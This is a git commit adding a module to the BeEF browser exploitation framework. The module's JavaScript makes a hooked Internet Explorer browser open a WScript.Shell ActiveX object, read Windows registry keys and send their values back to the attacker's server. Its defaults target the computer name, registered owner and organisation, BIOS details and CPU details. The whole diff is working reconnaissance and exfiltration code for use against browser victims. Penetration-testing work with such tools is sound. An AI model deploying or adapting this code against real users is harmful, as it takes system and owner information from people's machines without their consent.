Added module: Get Registry Keys (ActiveX)

Retrieves the values of Windows Registry keys using ActiveX. The user will be prompted to run the ActiveX control. git-svn-id: https://beef.googlecode.com/svn/trunk@1377 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-10-23 08:26:29 +00:00
parent 9170a2cd18
commit f902e16eba
3 changed files with 127 additions and 0 deletions
--- a/modules/host/get_registry_keys/command.js
+++ b/modules/host/get_registry_keys/command.js
@@ -0,0 +1,58 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var internal_counter = 0;
+	var result;
+	var key_paths;
+
+	function waituntilok() {
+		try {
+			var wsh = new ActiveXObject("WScript.Shell");
+			if (!wsh) throw("failed to create registry object");
+			else {
+				for (var i=0; i<key_paths.length; i++) {
+					var key_path = key_paths[i];
+					if (!key_path) continue;
+					try {
+						var key_value = wsh.RegRead(key_path);
+						result = key_path+": "+key_value;
+					} catch (e) {
+						result = key_path+": failed to retrieve key value";
+					}
+					beef.net.send('<%= @command_url %>', <%= @command_id %>, 'key_values='+result);
+				}
+			}
+			return;
+		} catch (e) {
+			internal_counter++;
+			if (internal_counter > 30) {
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'key_values=time out');
+				return;
+			}
+			setTimeout(function() {waituntilok()},1000);
+		}
+	}
+
+	try {
+		key_paths = "<%= @key_paths.gsub!(/[\n|\r\n]+/, "|BEEFDELIMITER|").gsub!(/\\/, "\\\\\\") %>".split(/\|BEEFDELIMITER\|/);
+		setTimeout(function() {waituntilok()},5000);
+	} catch (e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'key_values=malformed registry keys were supplied');
+	}
+
+});
+
--- a/modules/host/get_registry_keys/config.yaml
+++ b/modules/host/get_registry_keys/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        get_registry_keys:
+            enable: true
+            category: "Host"
+            name: "Get Registry Keys (ActiveX)"
+            description: "Retrieves the values of Windows Registry keys using ActiveX.<br /><br />The user will be prompted to run the ActiveX control.<br /><br />Note: each registry key must be placed on a new line."
+            authors: ["bcoles"]
+            target:
+                user_notify: ["IE"]
+                not_working: ["ALL"]
--- a/modules/host/get_registry_keys/module.rb
+++ b/modules/host/get_registry_keys/module.rb
@@ -0,0 +1,43 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Get_registry_keys < BeEF::Core::Command
+
+	def self.options
+		return [
+			{ 'name'=>'key_paths', 'ui_label' => 'Key(s)', 'description' => 'Enter registry keys. Note: each key requires its own line', 'type'=>'textarea', 'value'=>'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\SystemProductName
+HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\SystemManufacturer
+HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\BIOSVersion
+HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\BIOSReleaseDate
+HKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ComputerName\\ComputerName
+HKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ActiveComputerName\\ComputerName
+HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOwner
+HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOrganization
+HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName
+HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\\ProcessorNameString
+HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\\Identifier'
+}
+		]
+	end
+
+	def post_execute
+		content = {}
+		content['result'] = @datastore['key_values'] if not @datastore['key_values'].nil?
+		content['fail'] = 'No data was returned.' if content.empty?
+		save content
+	end
+  
+end
+